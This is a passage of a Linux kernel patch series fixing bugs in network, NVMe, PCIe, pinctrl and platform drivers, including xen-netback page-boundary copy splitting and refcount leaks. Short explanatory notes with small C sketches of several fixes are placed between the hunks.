++		if (!(net_dev->hw_features & tun_feats))
++			net_dev->features |= tun_feats;
++		net_dev->hw_enc_features |= tun_feats | tso_feats;
++		net_dev->hw_features |= tun_feats;
++	} else {
++		net_dev->hw_enc_features &= ~(tun_feats | tso_feats);
++		net_dev->hw_features &= ~tun_feats;
++		net_dev->features &= ~tun_feats;
+ 	}
+-	efx->net_dev->hw_enc_features = hw_enc_features;
+ 
+ 	/* don't fail init if RSS setup doesn't work */
+ 	rc = efx->type->rx_push_rss_config(efx, false,
+@@ -4021,7 +4032,10 @@ static unsigned int efx_ef10_recycle_ring_size(const struct efx_nic *efx)
+ 	 NETIF_F_HW_VLAN_CTAG_FILTER |	\
+ 	 NETIF_F_IPV6_CSUM |		\
+ 	 NETIF_F_RXHASH |		\
+-	 NETIF_F_NTUPLE)
++	 NETIF_F_NTUPLE |		\
++	 NETIF_F_SG |			\
++	 NETIF_F_RXCSUM |		\
++	 NETIF_F_RXALL)
+ 
+ const struct efx_nic_type efx_hunt_a0_vf_nic_type = {
+ 	.is_vf = true,
+diff --git a/drivers/net/ethernet/sfc/efx.c b/drivers/net/ethernet/sfc/efx.c
+index 3a86f1213a051..6a1bff54bc6c3 100644
+--- a/drivers/net/ethernet/sfc/efx.c
++++ b/drivers/net/ethernet/sfc/efx.c
+@@ -1001,21 +1001,18 @@ static int efx_pci_probe_post_io(struct efx_nic *efx)
+ 	}
+ 
+ 	/* Determine netdevice features */
+-	net_dev->features |= (efx->type->offload_features | NETIF_F_SG |
+-			      NETIF_F_TSO | NETIF_F_RXCSUM | NETIF_F_RXALL);
+-	if (efx->type->offload_features & (NETIF_F_IPV6_CSUM | NETIF_F_HW_CSUM)) {
+-		net_dev->features |= NETIF_F_TSO6;
+-		if (efx_has_cap(efx, TX_TSO_V2_ENCAP))
+-			net_dev->hw_enc_features |= NETIF_F_TSO6;
+-	}
+-	/* Check whether device supports TSO */
+-	if (!efx->type->tso_versions || !efx->type->tso_versions(efx))
+-		net_dev->features &= ~NETIF_F_ALL_TSO;
++	net_dev->features |= efx->type->offload_features;
++
++	/* Add TSO features */
++	if (efx->type->tso_versions && efx->type->tso_versions(efx))
++		net_dev->features |= NETIF_F_TSO | NETIF_F_TSO6;
++
+ 	/* Mask for features that also apply to VLAN devices */
+ 	net_dev->vlan_features |= (NETIF_F_HW_CSUM | NETIF_F_SG |
+ 				   NETIF_F_HIGHDMA | NETIF_F_ALL_TSO |
+ 				   NETIF_F_RXCSUM);
+ 
++	/* Determine user configurable features */
+ 	net_dev->hw_features |= net_dev->features & ~efx->fixed_features;
+ 
+ 	/* Disable receiving frames with bad FCS, by default. */
+diff --git a/drivers/net/ethernet/smsc/smsc911x.c b/drivers/net/ethernet/smsc/smsc911x.c
+index a2e511912e6a9..a690d139e1770 100644
+--- a/drivers/net/ethernet/smsc/smsc911x.c
++++ b/drivers/net/ethernet/smsc/smsc911x.c
+@@ -1037,8 +1037,6 @@ static int smsc911x_mii_probe(struct net_device *dev)
+ 		return ret;
+ 	}
+ 
+-	/* Indicate that the MAC is responsible for managing PHY PM */
+-	phydev->mac_managed_pm = true;
+ 	phy_attached_info(phydev);
+ 
+ 	phy_set_max_speed(phydev, SPEED_100);
+@@ -1066,6 +1064,7 @@ static int smsc911x_mii_init(struct platform_device *pdev,
+ 			     struct net_device *dev)
+ {
+ 	struct smsc911x_data *pdata = netdev_priv(dev);
++	struct phy_device *phydev;
+ 	int err = -ENXIO;
+ 
+ 	pdata->mii_bus = mdiobus_alloc();
+@@ -1108,6 +1107,10 @@ static int smsc911x_mii_init(struct platform_device *pdev,
+ 		goto err_out_free_bus_2;
+ 	}
+ 
++	phydev = phy_find_first(pdata->mii_bus);
++	if (phydev)
++		phydev->mac_managed_pm = true;
++
+ 	return 0;
+ 
+ err_out_free_bus_2:
+diff --git a/drivers/net/ethernet/stmicro/stmmac/common.h b/drivers/net/ethernet/stmicro/stmmac/common.h
+index ec9c130276d89..54bb072aeb2d3 100644
+--- a/drivers/net/ethernet/stmicro/stmmac/common.h
++++ b/drivers/net/ethernet/stmicro/stmmac/common.h
+@@ -532,7 +532,6 @@ struct mac_device_info {
+ 	unsigned int xlgmac;
+ 	unsigned int num_vlan;
+ 	u32 vlan_filter[32];
+-	unsigned int promisc;
+ 	bool vlan_fail_q_en;
+ 	u8 vlan_fail_q;
+ };
+diff --git a/drivers/net/ethernet/stmicro/stmmac/dwmac4_core.c b/drivers/net/ethernet/stmicro/stmmac/dwmac4_core.c
+index 8c7a0b7c99520..36251ec2589c9 100644
+--- a/drivers/net/ethernet/stmicro/stmmac/dwmac4_core.c
++++ b/drivers/net/ethernet/stmicro/stmmac/dwmac4_core.c
+@@ -472,12 +472,6 @@ static int dwmac4_add_hw_vlan_rx_fltr(struct net_device *dev,
+ 	if (vid > 4095)
+ 		return -EINVAL;
+ 
+-	if (hw->promisc) {
+-		netdev_err(dev,
+-			   "Adding VLAN in promisc mode not supported\n");
+-		return -EPERM;
+-	}
+-
+ 	/* Single Rx VLAN Filter */
+ 	if (hw->num_vlan == 1) {
+ 		/* For single VLAN filter, VID 0 means VLAN promiscuous */
+@@ -527,12 +521,6 @@ static int dwmac4_del_hw_vlan_rx_fltr(struct net_device *dev,
+ {
+ 	int i, ret = 0;
+ 
+-	if (hw->promisc) {
+-		netdev_err(dev,
+-			   "Deleting VLAN in promisc mode not supported\n");
+-		return -EPERM;
+-	}
+-
+ 	/* Single Rx VLAN Filter */
+ 	if (hw->num_vlan == 1) {
+ 		if ((hw->vlan_filter[0] & GMAC_VLAN_TAG_VID) == vid) {
+@@ -557,39 +545,6 @@ static int dwmac4_del_hw_vlan_rx_fltr(struct net_device *dev,
+ 	return ret;
+ }
+ 
+-static void dwmac4_vlan_promisc_enable(struct net_device *dev,
+-				       struct mac_device_info *hw)
+-{
+-	void __iomem *ioaddr = hw->pcsr;
+-	u32 value;
+-	u32 hash;
+-	u32 val;
+-	int i;
+-
+-	/* Single Rx VLAN Filter */
+-	if (hw->num_vlan == 1) {
+-		dwmac4_write_single_vlan(dev, 0);
+-		return;
+-	}
+-
+-	/* Extended Rx VLAN Filter Enable */
+-	for (i = 0; i < hw->num_vlan; i++) {
+-		if (hw->vlan_filter[i] & GMAC_VLAN_TAG_DATA_VEN) {
+-			val = hw->vlan_filter[i] & ~GMAC_VLAN_TAG_DATA_VEN;
+-			dwmac4_write_vlan_filter(dev, hw, i, val);
+-		}
+-	}
+-
+-	hash = readl(ioaddr + GMAC_VLAN_HASH_TABLE);
+-	if (hash & GMAC_VLAN_VLHT) {
+-		value = readl(ioaddr + GMAC_VLAN_TAG);
+-		if (value & GMAC_VLAN_VTHM) {
+-			value &= ~GMAC_VLAN_VTHM;
+-			writel(value, ioaddr + GMAC_VLAN_TAG);
+-		}
+-	}
+-}
+-
+ static void dwmac4_restore_hw_vlan_rx_fltr(struct net_device *dev,
+ 					   struct mac_device_info *hw)
+ {
+@@ -709,22 +664,12 @@ static void dwmac4_set_filter(struct mac_device_info *hw,
+ 	}
+ 
+ 	/* VLAN filtering */
+-	if (dev->features & NETIF_F_HW_VLAN_CTAG_FILTER)
++	if (dev->flags & IFF_PROMISC && !hw->vlan_fail_q_en)
++		value &= ~GMAC_PACKET_FILTER_VTFE;
++	else if (dev->features & NETIF_F_HW_VLAN_CTAG_FILTER)
+ 		value |= GMAC_PACKET_FILTER_VTFE;
+ 
+ 	writel(value, ioaddr + GMAC_PACKET_FILTER);
+-
+-	if (dev->flags & IFF_PROMISC && !hw->vlan_fail_q_en) {
+-		if (!hw->promisc) {
+-			hw->promisc = 1;
+-			dwmac4_vlan_promisc_enable(dev, hw);
+-		}
+-	} else {
+-		if (hw->promisc) {
+-			hw->promisc = 0;
+-			dwmac4_restore_hw_vlan_rx_fltr(dev, hw);
+-		}
+-	}
+ }
+ 
+ static void dwmac4_flow_ctrl(struct mac_device_info *hw, unsigned int duplex,
+diff --git a/drivers/net/ieee802154/ca8210.c b/drivers/net/ieee802154/ca8210.c
+index 0b0c6c0764fe9..d0b5129439ed6 100644
+--- a/drivers/net/ieee802154/ca8210.c
++++ b/drivers/net/ieee802154/ca8210.c
+@@ -1902,10 +1902,9 @@ static int ca8210_skb_tx(
+ 	struct ca8210_priv  *priv
+ )
+ {
+-	int status;
+ 	struct ieee802154_hdr header = { };
+ 	struct secspec secspec;
+-	unsigned int mac_len;
++	int mac_len, status;
+ 
+ 	dev_dbg(&priv->spi->dev, "%s called\n", __func__);
+ 
+diff --git a/drivers/net/ipa/gsi_trans.c b/drivers/net/ipa/gsi_trans.c
+index 0f52c068c46d6..ee6fb00b71eb6 100644
+--- a/drivers/net/ipa/gsi_trans.c
++++ b/drivers/net/ipa/gsi_trans.c
+@@ -156,7 +156,7 @@ int gsi_trans_pool_init_dma(struct device *dev, struct gsi_trans_pool *pool,
+ 	 * gsi_trans_pool_exit_dma() can assume the total allocated
+ 	 * size is exactly (count * size).
+ 	 */
+-	total_size = get_order(total_size) << PAGE_SHIFT;
++	total_size = PAGE_SIZE << get_order(total_size);
+ 
+ 	virt = dma_alloc_coherent(dev, total_size, &addr, GFP_KERNEL);
+ 	if (!virt)
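The one-line change above fixes an order-of-operations bug: get_order() returns a page *order*, so "get_order(total_size) << PAGE_SHIFT" shifts the order (a small integer) rather than the size. With 4 KiB pages and total_size = 8192, get_order() returns 1; the old expression yields 1 << 12 = 4096 (too small), while PAGE_SIZE << 1 yields the intended 8192. A self-contained sketch with a simplified get_order() stand-in:

	#include <stdio.h>

	#define PAGE_SHIFT	12
	#define PAGE_SIZE	(1UL << PAGE_SHIFT)

	/* Simplified stand-in: smallest order with PAGE_SIZE << order >= size */
	static unsigned int get_order(unsigned long size)
	{
		unsigned int order = 0;

		while ((PAGE_SIZE << order) < size)
			order++;
		return order;
	}

	int main(void)
	{
		unsigned long size = 8192;

		printf("buggy: %lu\n", (unsigned long)get_order(size) << PAGE_SHIFT);
		printf("fixed: %lu\n", PAGE_SIZE << get_order(size));
		return 0;
	}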
+diff --git a/drivers/net/net_failover.c b/drivers/net/net_failover.c
+index 7a28e082436e4..d0c916a53d7ce 100644
+--- a/drivers/net/net_failover.c
++++ b/drivers/net/net_failover.c
+@@ -130,14 +130,10 @@ static u16 net_failover_select_queue(struct net_device *dev,
+ 			txq = ops->ndo_select_queue(primary_dev, skb, sb_dev);
+ 		else
+ 			txq = netdev_pick_tx(primary_dev, skb, NULL);
+-
+-		qdisc_skb_cb(skb)->slave_dev_queue_mapping = skb->queue_mapping;
+-
+-		return txq;
++	} else {
++		txq = skb_rx_queue_recorded(skb) ? skb_get_rx_queue(skb) : 0;
+ 	}
+ 
+-	txq = skb_rx_queue_recorded(skb) ? skb_get_rx_queue(skb) : 0;
+-
+ 	/* Save the original txq to restore before passing to the driver */
+ 	qdisc_skb_cb(skb)->slave_dev_queue_mapping = skb->queue_mapping;
+ 
+diff --git a/drivers/net/phy/dp83869.c b/drivers/net/phy/dp83869.c
+index b4ff9c5073a3c..9ab5eff502b71 100644
+--- a/drivers/net/phy/dp83869.c
++++ b/drivers/net/phy/dp83869.c
+@@ -588,15 +588,13 @@ static int dp83869_of_init(struct phy_device *phydev)
+ 						       &dp83869_internal_delay[0],
+ 						       delay_size, true);
+ 	if (dp83869->rx_int_delay < 0)
+-		dp83869->rx_int_delay =
+-				dp83869_internal_delay[DP83869_CLK_DELAY_DEF];
++		dp83869->rx_int_delay = DP83869_CLK_DELAY_DEF;
+ 
+ 	dp83869->tx_int_delay = phy_get_internal_delay(phydev, dev,
+ 						       &dp83869_internal_delay[0],
+ 						       delay_size, false);
+ 	if (dp83869->tx_int_delay < 0)
+-		dp83869->tx_int_delay =
+-				dp83869_internal_delay[DP83869_CLK_DELAY_DEF];
++		dp83869->tx_int_delay = DP83869_CLK_DELAY_DEF;
+ 
+ 	return ret;
+ }
+diff --git a/drivers/net/vmxnet3/vmxnet3_drv.c b/drivers/net/vmxnet3/vmxnet3_drv.c
+index 682987040ea82..da488cbb05428 100644
+--- a/drivers/net/vmxnet3/vmxnet3_drv.c
++++ b/drivers/net/vmxnet3/vmxnet3_drv.c
+@@ -1688,7 +1688,9 @@ not_lro:
+ 			if (unlikely(rcd->ts))
+ 				__vlan_hwaccel_put_tag(skb, htons(ETH_P_8021Q), rcd->tci);
+ 
+-			if (adapter->netdev->features & NETIF_F_LRO)
++			/* Use GRO callback if UPT is enabled */
++			if ((adapter->netdev->features & NETIF_F_LRO) &&
++			    !rq->shared->updateRxProd)
+ 				netif_receive_skb(skb);
+ 			else
+ 				napi_gro_receive(&rq->napi, skb);
+diff --git a/drivers/net/wwan/iosm/iosm_ipc_imem.c b/drivers/net/wwan/iosm/iosm_ipc_imem.c
+index 1e6a479766429..c066b0040a3fe 100644
+--- a/drivers/net/wwan/iosm/iosm_ipc_imem.c
++++ b/drivers/net/wwan/iosm/iosm_ipc_imem.c
+@@ -587,6 +587,13 @@ static void ipc_imem_run_state_worker(struct work_struct *instance)
+ 	while (ctrl_chl_idx < IPC_MEM_MAX_CHANNELS) {
+ 		if (!ipc_chnl_cfg_get(&chnl_cfg_port, ctrl_chl_idx)) {
+ 			ipc_imem->ipc_port[ctrl_chl_idx] = NULL;
++
++			if (ipc_imem->pcie->pci->device == INTEL_CP_DEVICE_7560_ID &&
++			    chnl_cfg_port.wwan_port_type == WWAN_PORT_XMMRPC) {
++				ctrl_chl_idx++;
++				continue;
++			}
++
+ 			if (ipc_imem->pcie->pci->device == INTEL_CP_DEVICE_7360_ID &&
+ 			    chnl_cfg_port.wwan_port_type == WWAN_PORT_MBIM) {
+ 				ctrl_chl_idx++;
+diff --git a/drivers/net/xen-netback/common.h b/drivers/net/xen-netback/common.h
+index 3dbfc8a6924ed..1fcbd83f7ff2e 100644
+--- a/drivers/net/xen-netback/common.h
++++ b/drivers/net/xen-netback/common.h
+@@ -166,7 +166,7 @@ struct xenvif_queue { /* Per-queue data for xenvif */
+ 	struct pending_tx_info pending_tx_info[MAX_PENDING_REQS];
+ 	grant_handle_t grant_tx_handle[MAX_PENDING_REQS];
+ 
+-	struct gnttab_copy tx_copy_ops[MAX_PENDING_REQS];
++	struct gnttab_copy tx_copy_ops[2 * MAX_PENDING_REQS];
+ 	struct gnttab_map_grant_ref tx_map_ops[MAX_PENDING_REQS];
+ 	struct gnttab_unmap_grant_ref tx_unmap_ops[MAX_PENDING_REQS];
+ 	/* passed to gnttab_[un]map_refs with pages under (un)mapping */
+diff --git a/drivers/net/xen-netback/netback.c b/drivers/net/xen-netback/netback.c
+index bf627af723bf9..5c266062c08f0 100644
+--- a/drivers/net/xen-netback/netback.c
++++ b/drivers/net/xen-netback/netback.c
+@@ -334,6 +334,7 @@ static int xenvif_count_requests(struct xenvif_queue *queue,
+ struct xenvif_tx_cb {
+ 	u16 copy_pending_idx[XEN_NETBK_LEGACY_SLOTS_MAX + 1];
+ 	u8 copy_count;
++	u32 split_mask;
+ };
+ 
+ #define XENVIF_TX_CB(skb) ((struct xenvif_tx_cb *)(skb)->cb)
+@@ -361,6 +362,8 @@ static inline struct sk_buff *xenvif_alloc_skb(unsigned int size)
+ 	struct sk_buff *skb =
+ 		alloc_skb(size + NET_SKB_PAD + NET_IP_ALIGN,
+ 			  GFP_ATOMIC | __GFP_NOWARN);
++
++	BUILD_BUG_ON(sizeof(*XENVIF_TX_CB(skb)) > sizeof(skb->cb));
+ 	if (unlikely(skb == NULL))
+ 		return NULL;
+ 
+@@ -396,11 +399,13 @@ static void xenvif_get_requests(struct xenvif_queue *queue,
+ 	nr_slots = shinfo->nr_frags + 1;
+ 
+ 	copy_count(skb) = 0;
++	XENVIF_TX_CB(skb)->split_mask = 0;
+ 
+ 	/* Create copy ops for exactly data_len bytes into the skb head. */
+ 	__skb_put(skb, data_len);
+ 	while (data_len > 0) {
+ 		int amount = data_len > txp->size ? txp->size : data_len;
++		bool split = false;
+ 
+ 		cop->source.u.ref = txp->gref;
+ 		cop->source.domid = queue->vif->domid;
+@@ -413,6 +418,13 @@ static void xenvif_get_requests(struct xenvif_queue *queue,
+ 		cop->dest.u.gmfn = virt_to_gfn(skb->data + skb_headlen(skb)
+ 				               - data_len);
+ 
++		/* Don't cross local page boundary! */
++		if (cop->dest.offset + amount > XEN_PAGE_SIZE) {
++			amount = XEN_PAGE_SIZE - cop->dest.offset;
++			XENVIF_TX_CB(skb)->split_mask |= 1U << copy_count(skb);
++			split = true;
++		}
++
+ 		cop->len = amount;
+ 		cop->flags = GNTCOPY_source_gref;
+ 
+@@ -420,7 +432,8 @@ static void xenvif_get_requests(struct xenvif_queue *queue,
+ 		pending_idx = queue->pending_ring[index];
+ 		callback_param(queue, pending_idx).ctx = NULL;
+ 		copy_pending_idx(skb, copy_count(skb)) = pending_idx;
+-		copy_count(skb)++;
++		if (!split)
++			copy_count(skb)++;
+ 
+ 		cop++;
+ 		data_len -= amount;
+@@ -441,7 +454,8 @@ static void xenvif_get_requests(struct xenvif_queue *queue,
+ 			nr_slots--;
+ 		} else {
+ 			/* The copy op partially covered the tx_request.
+-			 * The remainder will be mapped.
++			 * The remainder will be mapped or copied in the next
++			 * iteration.
+ 			 */
+ 			txp->offset += amount;
+ 			txp->size -= amount;
+@@ -539,6 +553,13 @@ static int xenvif_tx_check_gop(struct xenvif_queue *queue,
+ 		pending_idx = copy_pending_idx(skb, i);
+ 
+ 		newerr = (*gopp_copy)->status;
++
++		/* Split copies need to be handled together. */
++		if (XENVIF_TX_CB(skb)->split_mask & (1U << i)) {
++			(*gopp_copy)++;
++			if (!newerr)
++				newerr = (*gopp_copy)->status;
++		}
+ 		if (likely(!newerr)) {
+ 			/* The first frag might still have this slot mapped */
+ 			if (i < copy_count(skb) - 1 || !sharedslot)
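
A copy op targeting the skb head may now be split in two when the destination crosses a local XEN_PAGE_SIZE boundary, which is why tx_copy_ops doubled and why a split bitmask is consulted when checking statuses. A userspace sketch of the boundary clamp (constants illustrative):

#include <stdio.h>

#define PAGE_SZ 4096u

/* Sketch of the clamp added above: a copy of 'len' bytes landing at
 * 'dest_off' within a page must not cross the page end; the remainder
 * becomes a second copy op. Not the netback code itself. */
static unsigned clamp_to_page(unsigned dest_off, unsigned len, int *split)
{
    if (dest_off + len > PAGE_SZ) {
        *split = 1;
        return PAGE_SZ - dest_off;   /* first op covers up to the boundary */
    }
    *split = 0;
    return len;
}

int main(void)
{
    int split;
    unsigned first = clamp_to_page(4000, 200, &split);
    /* first == 96, split == 1: the remaining 104 bytes need a second op,
     * hence tx_copy_ops grew to 2 * MAX_PENDING_REQS. */
    printf("first=%u split=%d\n", first, split);
    return 0;
}
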
+diff --git a/drivers/nvme/host/pci.c b/drivers/nvme/host/pci.c
+index 29c902b9aecbd..ea3f0806783a3 100644
+--- a/drivers/nvme/host/pci.c
++++ b/drivers/nvme/host/pci.c
+@@ -3126,6 +3126,7 @@ out_dev_unmap:
+ 	nvme_dev_unmap(dev);
+ out_uninit_ctrl:
+ 	nvme_uninit_ctrl(&dev->ctrl);
++	nvme_put_ctrl(&dev->ctrl);
+ 	return result;
+ }
+ 
+@@ -3490,6 +3491,8 @@ static const struct pci_device_id nvme_id_table[] = {
+ 		.driver_data = NVME_QUIRK_BOGUS_NID, },
+ 	{ PCI_DEVICE(0x1d97, 0x2263), /* Lexar NM610 */
+ 		.driver_data = NVME_QUIRK_BOGUS_NID, },
++	{ PCI_DEVICE(0x1d97, 0x1d97), /* Lexar NM620 */
++		.driver_data = NVME_QUIRK_BOGUS_NID, },
+ 	{ PCI_DEVICE(0x1d97, 0x2269), /* Lexar NM760 */
+ 		.driver_data = NVME_QUIRK_BOGUS_NID, },
+ 	{ PCI_DEVICE(PCI_VENDOR_ID_AMAZON, 0x0061),
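
The added nvme_put_ctrl() balances the reference taken during controller initialization; uninit alone tears down state but does not drop the last reference. A toy refcount model of that unwind rule (not the driver's actual types):

#include <stdio.h>

struct ctrl { int refs; };

static void ctrl_init(struct ctrl *c) { c->refs = 1; }
static void ctrl_uninit(struct ctrl *c) { /* tears down state, keeps ref */ }
static void ctrl_put(struct ctrl *c)
{
    if (--c->refs == 0)
        printf("ctrl freed\n");
}

int main(void)
{
    struct ctrl c;
    ctrl_init(&c);
    /* ... probe fails ... */
    ctrl_uninit(&c);
    ctrl_put(&c);    /* without this, refs stays at 1 and the object leaks */
    return 0;
}
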
+diff --git a/drivers/pci/controller/dwc/pcie-designware.c b/drivers/pci/controller/dwc/pcie-designware.c
+index 6d5d619ab2e94..346f67d2fdae2 100644
+--- a/drivers/pci/controller/dwc/pcie-designware.c
++++ b/drivers/pci/controller/dwc/pcie-designware.c
+@@ -806,11 +806,6 @@ void dw_pcie_setup(struct dw_pcie *pci)
+ 		dw_pcie_writel_dbi(pci, PCIE_LINK_WIDTH_SPEED_CONTROL, val);
+ 	}
+ 
+-	val = dw_pcie_readl_dbi(pci, PCIE_PORT_LINK_CONTROL);
+-	val &= ~PORT_LINK_FAST_LINK_MODE;
+-	val |= PORT_LINK_DLL_LINK_EN;
+-	dw_pcie_writel_dbi(pci, PCIE_PORT_LINK_CONTROL, val);
+-
+ 	if (dw_pcie_cap_is(pci, CDM_CHECK)) {
+ 		val = dw_pcie_readl_dbi(pci, PCIE_PL_CHK_REG_CONTROL_STATUS);
+ 		val |= PCIE_PL_CHK_REG_CHK_REG_CONTINUOUS |
+@@ -818,6 +813,11 @@ void dw_pcie_setup(struct dw_pcie *pci)
+ 		dw_pcie_writel_dbi(pci, PCIE_PL_CHK_REG_CONTROL_STATUS, val);
+ 	}
+ 
++	val = dw_pcie_readl_dbi(pci, PCIE_PORT_LINK_CONTROL);
++	val &= ~PORT_LINK_FAST_LINK_MODE;
++	val |= PORT_LINK_DLL_LINK_EN;
++	dw_pcie_writel_dbi(pci, PCIE_PORT_LINK_CONTROL, val);
++
+ 	if (!pci->num_lanes) {
+ 		dev_dbg(pci->dev, "Using h/w default number of lanes\n");
+ 		return;
+diff --git a/drivers/pinctrl/pinctrl-amd.c b/drivers/pinctrl/pinctrl-amd.c
+index 32c3edaf90385..5e7b82a2b13d0 100644
+--- a/drivers/pinctrl/pinctrl-amd.c
++++ b/drivers/pinctrl/pinctrl-amd.c
+@@ -865,32 +865,34 @@ static const struct pinconf_ops amd_pinconf_ops = {
+ 	.pin_config_group_set = amd_pinconf_group_set,
+ };
+ 
+-static void amd_gpio_irq_init(struct amd_gpio *gpio_dev)
++static void amd_gpio_irq_init_pin(struct amd_gpio *gpio_dev, int pin)
+ {
+-	struct pinctrl_desc *desc = gpio_dev->pctrl->desc;
++	const struct pin_desc *pd;
+ 	unsigned long flags;
+ 	u32 pin_reg, mask;
+-	int i;
+ 
+ 	mask = BIT(WAKE_CNTRL_OFF_S0I3) | BIT(WAKE_CNTRL_OFF_S3) |
+ 		BIT(INTERRUPT_MASK_OFF) | BIT(INTERRUPT_ENABLE_OFF) |
+ 		BIT(WAKE_CNTRL_OFF_S4);
+ 
+-	for (i = 0; i < desc->npins; i++) {
+-		int pin = desc->pins[i].number;
+-		const struct pin_desc *pd = pin_desc_get(gpio_dev->pctrl, pin);
+-
+-		if (!pd)
+-			continue;
++	pd = pin_desc_get(gpio_dev->pctrl, pin);
++	if (!pd)
++		return;
+ 
+-		raw_spin_lock_irqsave(&gpio_dev->lock, flags);
++	raw_spin_lock_irqsave(&gpio_dev->lock, flags);
++	pin_reg = readl(gpio_dev->base + pin * 4);
++	pin_reg &= ~mask;
++	writel(pin_reg, gpio_dev->base + pin * 4);
++	raw_spin_unlock_irqrestore(&gpio_dev->lock, flags);
++}
+ 
+-		pin_reg = readl(gpio_dev->base + i * 4);
+-		pin_reg &= ~mask;
+-		writel(pin_reg, gpio_dev->base + i * 4);
++static void amd_gpio_irq_init(struct amd_gpio *gpio_dev)
++{
++	struct pinctrl_desc *desc = gpio_dev->pctrl->desc;
++	int i;
+ 
+-		raw_spin_unlock_irqrestore(&gpio_dev->lock, flags);
+-	}
++	for (i = 0; i < desc->npins; i++)
++		amd_gpio_irq_init_pin(gpio_dev, i);
+ }
+ 
+ #ifdef CONFIG_PM_SLEEP
+@@ -943,8 +945,10 @@ static int amd_gpio_resume(struct device *dev)
+ 	for (i = 0; i < desc->npins; i++) {
+ 		int pin = desc->pins[i].number;
+ 
+-		if (!amd_gpio_should_save(gpio_dev, pin))
++		if (!amd_gpio_should_save(gpio_dev, pin)) {
++			amd_gpio_irq_init_pin(gpio_dev, pin);
+ 			continue;
++		}
+ 
+ 		raw_spin_lock_irqsave(&gpio_dev->lock, flags);
+ 		gpio_dev->saved_regs[i] |= readl(gpio_dev->base + pin * 4) & PIN_IRQ_PENDING;
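
The refactor isolates the per-pin mask-clearing so probe can apply it to every pin while resume applies it only to pins whose state was not saved. A userspace sketch with invented register layout and bit positions:

#include <stdint.h>
#include <stdio.h>

#define WAKE_S0I3  (1u << 14)
#define WAKE_S3    (1u << 13)
#define IRQ_MASK   (1u << 12)
#define IRQ_EN     (1u << 11)
#define WAKE_S4    (1u << 15)

static uint32_t regs[64];   /* stand-in for the MMIO pin registers */

/* One helper per pin, reusable from both probe and resume; the real
 * driver does this under its spinlock. */
static void irq_init_pin(int pin)
{
    uint32_t mask = WAKE_S0I3 | WAKE_S3 | IRQ_MASK | IRQ_EN | WAKE_S4;
    regs[pin] &= ~mask;
}

int main(void)
{
    regs[3] = 0xffffffff;
    irq_init_pin(3);
    printf("pin3=0x%08x\n", regs[3]);
    return 0;
}
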
+diff --git a/drivers/pinctrl/pinctrl-at91-pio4.c b/drivers/pinctrl/pinctrl-at91-pio4.c
+index 373eed8bc4be9..c775d239444a6 100644
+--- a/drivers/pinctrl/pinctrl-at91-pio4.c
++++ b/drivers/pinctrl/pinctrl-at91-pio4.c
+@@ -1206,7 +1206,6 @@ static int atmel_pinctrl_probe(struct platform_device *pdev)
+ 		dev_err(dev, "can't add the irq domain\n");
+ 		return -ENODEV;
+ 	}
+-	atmel_pioctrl->irq_domain->name = "atmel gpio";
+ 
+ 	for (i = 0; i < atmel_pioctrl->npins; i++) {
+ 		int irq = irq_create_mapping(atmel_pioctrl->irq_domain, i);
+diff --git a/drivers/pinctrl/pinctrl-ocelot.c b/drivers/pinctrl/pinctrl-ocelot.c
+index 29e4a6282a641..1dcbd0937ef5a 100644
+--- a/drivers/pinctrl/pinctrl-ocelot.c
++++ b/drivers/pinctrl/pinctrl-ocelot.c
+@@ -1204,7 +1204,7 @@ static int ocelot_pinmux_set_mux(struct pinctrl_dev *pctldev,
+ 	regmap_update_bits(info->map, REG_ALT(0, info, pin->pin),
+ 			   BIT(p), f << p);
+ 	regmap_update_bits(info->map, REG_ALT(1, info, pin->pin),
+-			   BIT(p), f << (p - 1));
++			   BIT(p), (f >> 1) << p);
+ 
+ 	return 0;
+ }
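
The 2-bit alternate-function value f is split across two registers: bit 0 of f lands at bit p of ALT0 and bit 1 of f at bit p of ALT1. As far as the masked bit is concerned, the old expression f << (p - 1) happened to give the same result for p >= 1, but for p == 0 it shifts by -1, which is undefined in C. A worked check of the corrected form:

#include <stdint.h>
#include <stdio.h>

static uint32_t alt1_bits(unsigned f, unsigned p)
{
    return ((f >> 1) & 1u) << p;   /* the fixed (f >> 1) << p, masked */
}

int main(void)
{
    /* f = 2 (binary 10) on the first pin of a register (p = 0): */
    printf("alt1 bit = 0x%x\n", alt1_bits(2, 0)); /* 0x1, as intended;
                                                     2 << (0 - 1) is UB */
    return 0;
}
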
+diff --git a/drivers/platform/surface/aggregator/bus.c b/drivers/platform/surface/aggregator/bus.c
+index de539938896e2..b501a79f2a08a 100644
+--- a/drivers/platform/surface/aggregator/bus.c
++++ b/drivers/platform/surface/aggregator/bus.c
+@@ -485,8 +485,10 @@ int __ssam_register_clients(struct device *parent, struct ssam_controller *ctrl,
+ 		 * device, so ignore it and continue with the next one.
+ 		 */
+ 		status = ssam_add_client_device(parent, ctrl, child);
+-		if (status && status != -ENODEV)
++		if (status && status != -ENODEV) {
++			fwnode_handle_put(child);
+ 			goto err;
++		}
+ 	}
+ 
+ 	return 0;
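
fwnode child iterators hold a reference on the current child, so leaving the loop early without fwnode_handle_put() leaks that reference. A userspace model of the rule:

#include <stdio.h>

struct node { int refs; };

static void node_put(struct node *n) { n->refs--; }

static int visit_all(struct node *nodes, int count)
{
    for (int i = 0; i < count; i++) {
        nodes[i].refs++;                 /* iterator takes a reference */
        if (i == 1) {                    /* simulate a fatal error */
            node_put(&nodes[i]);         /* the fix: put before bailing */
            return -1;
        }
        node_put(&nodes[i]);             /* normal path: iterator drops it */
    }
    return 0;
}

int main(void)
{
    struct node nodes[3] = { {0}, {0}, {0} };
    visit_all(nodes, 3);
    printf("refs after error: %d %d %d\n",
           nodes[0].refs, nodes[1].refs, nodes[2].refs); /* all 0: no leak */
    return 0;
}
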
+diff --git a/drivers/platform/x86/ideapad-laptop.c b/drivers/platform/x86/ideapad-laptop.c
+index 0eb5bfdd823a1..959ec3c5f376e 100644
+--- a/drivers/platform/x86/ideapad-laptop.c
++++ b/drivers/platform/x86/ideapad-laptop.c
+@@ -1170,7 +1170,6 @@ static const struct key_entry ideapad_keymap[] = {
+ 	{ KE_KEY,  65, { KEY_PROG4 } },
+ 	{ KE_KEY,  66, { KEY_TOUCHPAD_OFF } },
+ 	{ KE_KEY,  67, { KEY_TOUCHPAD_ON } },
+-	{ KE_KEY,  68, { KEY_TOUCHPAD_TOGGLE } },
+ 	{ KE_KEY, 128, { KEY_ESC } },
+ 
+ 	/*
+@@ -1526,18 +1525,16 @@ static void ideapad_sync_touchpad_state(struct ideapad_private *priv, bool send_
+ 	if (priv->features.ctrl_ps2_aux_port)
+ 		i8042_command(&param, value ? I8042_CMD_AUX_ENABLE : I8042_CMD_AUX_DISABLE);
+ 
+-	if (send_events) {
+-		/*
+-		 * On older models the EC controls the touchpad and toggles it
